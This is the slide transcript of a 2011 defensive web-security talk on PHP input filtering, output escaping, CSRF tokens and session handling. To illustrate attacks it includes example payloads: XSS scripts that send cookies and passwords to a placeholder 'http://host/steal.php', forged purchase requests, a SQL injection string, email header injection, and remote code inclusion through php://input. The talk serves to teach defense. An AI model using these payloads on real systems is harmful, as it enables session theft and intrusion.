Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Evolution of Web Security

Chris Shiflett
September 26, 2011
Programming
10
1.2k

Evolution of Web Security

This is a multi-faceted tutorial that explores new concepts in web security. After a solid grounding in well-known exploits like cross-site scripting (XSS) and cross-site request forgeries (CSRF), I demonstrate how traditional exploits are being combined together and with other technologies like Ajax to launch sophisticated attacks that penetrate firewalls, target users, and spread like worms. I then discuss some ideas for the future, such as evaluating trends to identify suspicious activity and understanding human tendencies and behavior to help provide a better, more secure user experience.

Chris Shiflett

September 26, 2011
Tweet

More Decks by Chris Shiflett

See All by Chris Shiflett
Understanding People
shiflett
2
2.2k

Other Decks in Programming

See All in Programming
Kubernetesコントローラーのパフォーマンスチューニング
zoetrope
4
410
テキストエディタのブラウザ実装 / tokyo_study
oliver_diary
0
150
オンサイトキックオフでロケットスタート〜貴重なリアル対面を活かすやり方と構造〜
sasakendayo
0
280
macのunicode正規化.pdf
mski_iksm
0
890
ココナラにおけるジョーシス / Netskope適用に向けたアプローチ実録
coconala_engineer
0
170
CyberAgentにおけるKubernetes as a Serviceの歩みと利用者を支える機能 / cainfra01-amsy810-kubernetes
masayaaoyama
1
800
FlutterとMaterial3
dosukoi_android
0
300
ANDPADの攻めと守り
andpad
1
260
Cloudflare の画像最適化機能を紹介してみる
maroon1st
0
540
全ブラウザ対応したcontainer queryは何がスゴイのか?
tonkotsuboy_com
11
11k
Androidアプリで安定して動作させ継続的に開発するために設計の原則を利用して開発した話
takahirom
0
650
How to hide the key
akkeylab
0
120

Featured

See All Featured
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
soudai
44
14k
How New CSS Is Changing Everything About Graphic Design on the Web
jensimmons
214
12k
In The Pink: A Labor of Love
frogandcode
133
21k
The Pragmatic Product Professional
lauravandoore
21
3.6k
Facilitating Awesome Meetings
lara
34
4.7k
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
sstephenson
152
13k
Distributed Sagas: A Protocol for Coordinating Microservices
caitiem20
318
19k
Thoughts on Productivity
jonyablonski
50
2.8k
Designing Experiences People Love
moore
130
22k
Product Roadmaps are Hard
iamctodd
38
7.9k
10 Git Anti Patterns You Should be Aware of
lemiorhan
643
55k
The Brand Is Dead. Long Live the Brand.
mthomps
48
3k

Transcript

  1. Evolution of
    Web Security
    Chris Shiflett
    @shiflett ▪ shiflett.org

    View Slide

  2. Who am I?
    Web craftsman from Brooklyn, NY, and
    founding member of Analog, a web design
    & development co-operative.

    View Slide

  3. 1. Fundamentals

    View Slide

  4. Defense in depth
    — Redundant safeguards are valuable.
    Least privilege
    — Grant as little freedom as possible.
    Least complicated
    — Complexity breeds mistakes.
    Three Principles

    View Slide

  5. Filter input.
    — Ensure data coming in is valid.
    Escape output.
    — Ensure data going out is not misinterpreted.
    Two Practices

    View Slide

  6. Application Escape
    Filter
    Filter input. Escape output.

    View Slide

  7. $clean = array();
    if (ctype_alpha($_POST['name'])) {
    $clean['name'] = $_POST['name'];
    } else {
    /* Error */
    }
    ?>

    View Slide

  8. $clean = array();
    switch ($_POST['color']) {
    case 'red':
    case 'green':
    case 'blue':
    $clean['color'] = $_POST['color'];
    break;
    default:
    /* Error */
    break;
    }
    ?>

    View Slide

  9. $clean = array();
    $colors = array('red', 'green', 'blue');
    if (in_array($_POST['color'], $colors)) {
    $clean['color'] = $_POST['color'];
    } else {
    /* Error */
    }
    ?>

    View Slide

  10. $clean = array();
    $colors = array();
    $colors['red'] = '';
    $colors['green'] = '';
    $colors['blue'] = '';
    if (isset($colors[$_POST['color']])) {
    $clean['color'] = $_POST['color'];
    } else {
    /* Error */
    }
    ?>

    View Slide

  11. $clean = array();
    if (preg_match('/^\d{5}$/',
    $_POST['zip'])) {
    $clean['zip'] = $_POST['zip'];
    } else {
    /* Error */
    }
    ?>

    View Slide

  12. /* Content-Type: text/html; charset=UTF-8' */
    $html = array();
    $html['user'] = htmlentities($clean['user'],
    ENT_QUOTES,
    'UTF-8');
    echo "Welcome, {$html['user']}.";
    ?>

    View Slide

  13. View Slide

  14. Cross-Site
    Scripting
    Cross-Site
    Request
    Forgeries
    SQL Injection
    Session Fixation
    Session
    Hijacking
    Email Injection
    Remote Code
    Injection
    Exploits

    View Slide

  15. Victim
    Attacker
    Cross-Site Scripting
    Target
    XSS
    HTML
    XSS
    1 2

    View Slide

  16. echo $_GET['user'];
    http://host/foo.php?user=%3Cscript%3E…
    echo '…';<br/>

    View Slide

  17. <br/>document.location =<br/>'http://host/steal.php?cookies=' +<br/>encodeURI(document.cookie);<br/>
    Steal Cookies

    View Slide

  18. <br/>document.forms[0].action =<br/>'http://host/steal.php';<br/>
    Steal Passwords

    View Slide


  19. style="display: none" />
    style="display: none" />


    Steal Saved Passwords

    View Slide


  20. Short & Simple

    View Slide

  21. $string = "alert('XSS');";
    $string = mb_convert_encoding($string, 'UTF-7');
    echo htmlentities($string);
    Character Encoding
    Google XSS Example
    http://shiflett.org/blog/2005/dec/google-xss-example

    View Slide

  22. FIEO.
    Use valid HTML.
    — http://validator.w3.org/
    Use existing solutions.
    — PHP developers, use htmlentities() or htmlspecialchars().
    — Make sure you indicate the character encoding!
    Need to allow HTML?
    — Use HTML Purifier, even if you’re not using PHP:
    http://htmlpurifier.org/
    Stop It!

    View Slide

  23. Target
    Attacker
    Cross-Site Request Forgeries
    Victim
    ? CSRF
    1 2

    View Slide

  24. Because the attack is carried out by
    the victim, CSRF can bypass:
    — HTTP auth
    — Session-based auth
    — Firewalls
    — &c.
    CSRF

    View Slide

  25. Buy

    value="059600656X" />


    POST /buy.php HTTP/1.1
    Host: host
    Cookie: PHPSESSID=1234
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 15
    isbn=059600656X

    View Slide

  26. Forging GET
    GET /buy.php?isbn=059600656X HTTP/1.1
    Host: host
    Cookie: PHPSESSID=1234

    View Slide





  27. document.buy.submit();
    Forging POST
    POST /buy.php HTTP/1.1
    Host: host
    Cookie: PHPSESSID=1234
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 15
    isbn=059600656X

    View Slide

  28. Digg (Fixed)
    http://4diggers.blogspot.com/
    Amazon (Fixed?)
    http://shiflett.org/amazon.php
    CSRF Exploits

    View Slide

  29. <br/>new Image().src =<br/>'http://host/steal.php?cookies=' +<br/>encodeURI(document.cookie);<br/>
    Steal Cookies (Improved)

    View Slide

  30. $token = md5(uniqid(rand(), TRUE));
    $_SESSION['token'] = $token;
    $html['token'] = htmlentities($token, ENT_QUOTES,
    'UTF-8');
    Stop It!
    name="token"
    value="" />

    View Slide

  31. Database
    Attacker
    SQL Injection
    Target
    SQL
    SQL
    SQL
    1 2

    View Slide

  32. SELECT count(*)
    FROM users
    WHERE username = '{$_POST['username']}'
    AND password = '…'
    chris' /*
    SELECT count(*)
    FROM users
    WHERE username = 'chris' /*'
    AND password = '…'

    View Slide

  33. FIEO.
    Use prepared statements.
    — PHP developers, use PDO.
    Stop It!
    addslashes() Versus mysql_real_escape_string()
    http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

    View Slide

  34. http://host/login.php?PHPSESSID=1234
    Session Fixation

    View Slide

  35. Regenerate the session identifier.
    — PHP developers, session_regenerate_id(TRUE).
    Do this whenever the privilege level
    changes.
    Stop It!

    View Slide

  36. Attacker impersonates a victim.
    In PHP, by default, only requires a valid
    session identifier.
    Session identifier obtained using:
    — Prediction
    — Capture
    — Fixation
    Session Hijacking

    View Slide

  37. Understand how sessions work.
    Minimize session identifier exposure.
    — SSL
    — Separate domain for embedded resources
    Trending
    — https://panopticlick.eff.org/
    — More on this later…
    Stop It!

    View Slide

  38. [email protected]\r\nBcc: [email protected]\r\nBcc: …
    To: [email protected]
    Subject: Feedback
    From: [email protected]
    Bcc: [email protected]
    Bcc: …
    Email Injection
    mail('[email protected]', 'Feedback', '...',
    "From: {$_POST['email']}");

    View Slide

  39. FIEO.
    — http://iamcal.com/publish/articles/php/parsing_email
    — PHP developers, use ctype_print() as defense in depth.
    Stop It!

    View Slide

  40. Target
    Attacker
    Remote Code Injection

    View Slide

  41. include "{$_COOKIE['type']}.php";
    Cookie: type=http://host/inject.inc?
    include "http://host/inject.inc?.php";

    View Slide

  42. This example exploits allow_url_fopen.
    PHP 5 has allow_url_include.
    — By default, allow_url_include is disabled.
    Remote Code Injection

    View Slide

  43. include "php://input";
    POST /script.php?type=php://input%00 HTTP/1.1
    Host: host
    Content-Type: application/x-www-form-urlencoded
    Content-Length: ?
    ?
    include "{$_GET['type']}.php";

    View Slide

  44. FIEO.
    — If at all possible, use a white list.
    Stop It!

    View Slide

  45. 2. Emerging Trends

    View Slide

  46. Ajax
    “The name is shorthand for Asynchronous
    JavaScript + XML, and it represents a
    fundamental shift in what’s possible on
    the Web.”
    — Jesse James Garrett

    View Slide

  47. Ajax
    “Client-side techniques & technologies
    that allow two-way communication
    between the client and the server without
    reloading the page.”

    View Slide

  48. Target
    Victim
    JS
    1. XMLHttpRequest
    2. HTML form + victim’s token
    3. XMLHttpRequest + victim’s token
    Cross-Domain Ajax

    View Slide

  49. Target
    Victim
    XSS + Ajax + CSRF
    XSS
    1. XMLHttpRequest
    2. HTML form + victim’s token
    3. XMLHttpRequest + victim’s token

    View Slide

  50. XSS is a perfect platform for CSRF.
    CSRF attacks can exploit XSS
    vulnerabilities.
    Victims can become attackers.
    Rinse. Repeat.
    Worms

    View Slide

  51. Browser Hijacking
    http://shiflett.org/blog/2006/oct/using-csrf-for-browser-hijacking
    Myspace CSRF and XSS Worm (Samy)
    http://shiflett.org/blog/2005/oct/myspace-csrf-and-xss-worm-samy

    View Slide




  52. Cross-Domain Ajax
    Thanks, Flash!

    View Slide

  53. Cross-Domain Ajax
    domain="*" API domain Vulnerable?
    No yahoo.com No
    No youtube.com No
    Yes api.flickr.com No
    Yes No adobe.com Yes No

    View Slide

  54. Target
    Attacker
    JavaScript Hijacking
    Victim
    ? CSRF
    1 2
    3
    4

    View Slide


  55. [{"email": "[email protected]"}]
    JavaScript Hijacking Demo
    http://mochikit.com/fortify_fud/

    View Slide

  56. JavaScript Hijacking
    “If you audit your application for CSRF
    flaws, you’ve defeated this attack.
    Moreover, the well-known, pre-existing
    exploits for CSRF are actually worse than
    this attack.”
    — Thomas Ptacek

    View Slide

  57. 3. Ideas for the Future

    View Slide

  58. Panopticlick
    https://panopticlick.eff.org/
    Trending
    “When you visit a web site, you are
    allowing that site to access a lot of
    information about your computer’s
    configuration. Combined, this information
    can create a kind of fingerprint — a
    signature that could be used to identify
    you and your computer.”

    View Slide

  59. Trending
    “Not the intent, but Panopticlick from @eff
    would be useful for preventing session
    hijacking.”
    — http://twitter.com/shiflett/status/8562663352

    View Slide

  60. Establish trends to help detect
    anomalies.
    Trends can be based on identity or
    behavior.
    Trending is imperfect; use as defense in
    depth.
    Trending

    View Slide

  61. Slides
    http://shiflett.org/evolution-of-web-security.pdf
    http://slideshare.net/shiflett

    View Slide

  62. Follow me on Twitter.
    — @shiflett
    Comment on my blog.
    — shiflett.org
    Email me.
    [email protected]flett.org
    Work with me.
    — analog.coop
    Feedback?

    View Slide